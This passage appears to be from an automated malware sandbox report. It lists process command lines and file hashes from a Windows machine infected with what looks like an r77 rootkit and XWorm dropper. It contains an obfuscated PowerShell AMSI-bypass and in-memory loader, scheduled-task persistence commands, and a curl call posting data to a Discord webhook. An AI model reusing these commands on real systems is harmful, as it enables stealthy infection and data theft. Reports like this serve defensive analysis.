$_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+'f'+'t'+''+[Char](46)+''+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+'s'+''+'a'+''+'f'+'e'+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](118)+'e'+[Char](77)+''+'e'+''+'t'+''+[Char](104)+''+'o'+''+[Char](100)+''+'s'+'');$YddLyJKHpNyhAu=$wrKoaJuctLjFo.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+'Pr'+'o'+''+[Char](99)+''+'A'+''+[Char](100)+''+[Char](100)+''+'r'+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+'S'+''+[Char](116)+''+[Char](97)+'t'+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$aAimDKIDCiENaekgzNL=RuIdwLFZdpne @([String])([IntPtr]);$HjoRkpFocncOZqvdSwRmVO=RuIdwLFZdpne @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$FUdCvLhuypo=$wrKoaJuctLjFo.GetMethod('Ge'+[Char](116)+''+[Char](77)+''+'o'+''+[Char](100)+''+'u'+'l'+[Char](101)+'H'+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+'n'+[Char](101)+''+'l'+'32'+'.'+''+[Char](100)+'l'+[Char](108)+'')));$kISoJahlEZayRd=$YddLyJKHpNyhAu.Invoke($Null,@([Object]$FUdCvLhuypo,[Object]('Lo'+'a'+''+[Char](100)+''+'L'+'i'+[Char](98)+''+[Char](114)+''+'a'+''+[Char](114)+'y'+'A'+'')));$YFkSeGHziLwnHaMZL=$YddLyJKHpNyhAu.Invoke($Null,@([Object]$FUdCvLhuypo,[Object](''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+'a'+'lP'+[Char](114)+''+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+'t')));$hKSadWt=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kISoJahlEZayRd,$aAimDKIDCiENaekgzNL).Invoke(''+[Char](97)+''+'m'+''+'s'+''+[Char](105)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'');$uPCrjwIokZiHlzXfl=$YddLyJKHpNyhAu.Invoke($Null,@([Object]$hKSadWt,[Object]('A'+'m'+''+[Char](115)+'iS'+[Char](99)+''+'a'+''+'n'+''+[Char](66)+'uff'+[Char](101)+''+[Char](114)+'')));$DrKsXoMSIW=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YFkSeGHziLwnHaMZL,$HjoRkpFocncOZqvdSwRmVO).Invoke($uPCrjwIokZiHlzXfl,[uint32]8,4,[ref]$DrKsXoMSIW);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$uPCrjwIokZiHlzXfl,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YFkSeGHziLwnHaMZL,$HjoRkpFocncOZqvdSwRmVO).Invoke($uPCrjwIokZiHlzXfl,[uint32]8,0x20,[ref]$DrKsXoMSIW);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+'T'+'WA'+'R'+''+[Char](69)+'').GetValue(''+'$'+''+'7'+''+[Char](55)+''+[Char](115)+'t'+'a'+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"' & exit
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7039.tmp.bat""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"'
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{1923dcfb-2d6d-4177-b724-07d1bfc48873}
C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
"C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"
C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
"C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"
C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
"C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2448 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Users\Admin\AppData\Roaming\$77-scchost.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe"' & exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\TEMP\tmp79AF.tmp.bat""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe"'
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-scchost.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5984 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:2
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""System.UnauthorizedAccessException: Access to the path 'C:\Users\Admin\Videos\thing' is denied. at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath) at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy, Boolean useLongPath, Boolean checkHost) at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options, String msgPath, Boolean bFromProxy, Boolean useLongPath, Boolean checkHost) at System.IO.StreamWriter.CreateFile(String path, Boolean append, Boolean checkHost) at System.IO.StreamWriter..ctor(String path, Boolean append, Encoding encoding, Int32 bufferSize, Boolean checkHost) at System.IO.StreamWriter..ctor(String path, Boolean append, Encoding encoding) at Dropper.Dropping.Main()"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\curl.exe
curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""System.UnauthorizedAccessException: Access to the path 'C:\Users\Admin\Videos\thing' is denied.
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Users\Admin\AppData\Local\Temp\7zip\7z.exe
"C:\Users\Admin\AppData\Local\Temp\7zip\7z.exe" x "C:\Windows\Resources\xworm fixed.zip" -o"C:\Windows\Resources\xworm fixed" -y
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Windows\SYSTEM32\shutdown.exe
shutdown.exe /f /s /t 0
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3998855 /state1:0x41c64e6d
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
Network
Files
| MD5 | 32abb4c73aa6dee7d892ca30d432c74e |
| SHA1 | 603a9045df757fd1bf4defa48a11f54d72d53add |
| SHA256 | a64f54473b45ad2201f19886dda97bd8d27a30485f1303656dcb4ac8cab8ad46 |
| SHA512 | 7dedd14a5b0dc5e178748382c066fcdbf4ab8409e787fc0ef706f22dc20d6da2935acf3866b6de2d180ed9f441f1529e71ba769aeda2723927dc435f4be375f9 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
| MD5 | 8b7ceacc0f2fa0557e3cd79b88983613 |
| SHA1 | b06c3b1677d2a7ba1c75cf32e5aa41e63712888a |
| SHA256 | b326b55a265055eb350e6e0cd34aa43932d4716e6afb690459dd1a9293290b99 |
| SHA512 | 21b2048c1d3162bd685728fd1700b424af853b5d0559f63154fb16bdc04553c9b48c65bb2b5963fc4bff48fcfc025c560aaa6679e67b8d4024f5f6a5424eda02 |
memory/4608-1568-0x000000001CD50000-0x000000001CE00000-memory.dmp
memory/4608-1569-0x0000000020590000-0x0000000020AB8000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
| MD5 | c4f3c29f24adac0d8c033d2c1e5508f3 |
| SHA1 | f272966060d0f451485c6430a99aad749ad96320 |
| SHA256 | 499de30e49f4162b3bc732f176aaf2f4e5f56c95b63b556071197c8bb339b901 |
| SHA512 | 688517453af3168ac76858878cc5ba6c27a3a3b2d51e027547412e6b13ee6d08033b85c10c62aee8d0ed69c84be2d7d52b826ecda03aa0d82fc71fd32519ced5 |
C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf
| MD5 | cf759e4c5f14fe3eec41b87ed756cea8 |
| SHA1 | c27c796bb3c2fac929359563676f4ba1ffada1f5 |
| SHA256 | c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761 |
| SHA512 | c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b |
C:\Users\Admin\AppData\Local\Temp\7zip\7z.exe
| MD5 | 1c3b5af02f308c2d61314fe6344a7434 |
| SHA1 | 5a0278ad2d2cd2437044e4d8b5e998533982293b |
| SHA256 | 64a0a588bfb057c877f42773976fd6952be90eafd373b3d0595fe20a8faccd74 |
| SHA512 | 6093b7258e29a04add73acb9f707f70c27149c9d65c9ecdb58452adedb8a7ad40a71af44927cf5b1e181d7ccab3bb39b68d0a737a7ab197943e464956624002f |
memory/6656-1775-0x0000000001000000-0x0000000001010000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 966bd91064a66d138a5fa8eb7e13a06e |
| SHA1 | 9f4e39a60604c933ff0d4e2c2acc35e7dcd44de9 |
| SHA256 | bf8c14f94ad82090d74bc9671c905bb7a50e62441617accfc48cf973466908f8 |
| SHA512 | dd4fc3654326f85de22df57b5ad966828778c39e76e9fe64a73aed40bd924a2c76a18b362da5953deccf987788b9db8430c17489080ab6e007d67dbe49bdeef7 |
memory/6656-1785-0x0000000001030000-0x000000000104E000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
| MD5 | 4060c33d521b297b208c8d27735af3bc |
| SHA1 | 045c1b88fc574e240ab41c0a3bd5c3b1e1be4bf8 |
| SHA256 | d0a248ff6e821fc8d3a9abcc2eead96a5696efbea754f981efbad74291a43bf3 |
| SHA512 | 9857ff0fb1be80dff585521dab213c59bf240c71a0c4be37db3c48e3d30ea8fa26eede2449e99eba5672fad53101491c33ab804cf6d345339835d428fa209dfd |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
| MD5 | 8f89e07fe4508ddeef1ba4567f254209 |
| SHA1 | b5ef23e62964bfa1afabbc242a317e8b711de7e4 |
| SHA256 | e4540cbba11d2026acb35efb7147ef0b44feb970ca3e316dc7670c603adc41cc |
| SHA512 | 1930e13b538eceb56e2ab19d023fc3df1a4d8f2252f9f72a90df36746b94b0363cabf7737c7c93990f64b2cae2cb7deb195e7c5c326bc3c39057bd3b4bf9bbfd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | cf5ef9ddb28996eedf404a6293c00330 |
| SHA1 | eb9936808005b16cbf39aa4ecfcf3e2203aef5f4 |
| SHA256 | 76ddb7cf4ed4d19817901e79b0a172e7f63306db03ccd0af32770ad500410c52 |
| SHA512 | 2c63ebecf0f2c754a4553e0bbb1bf1900a1eb04df4167dbd956cea88b6893c3b42cc5e9618d6911aa39cb64644e765880d89a34958a549c8c4ef31246a9c8c21 |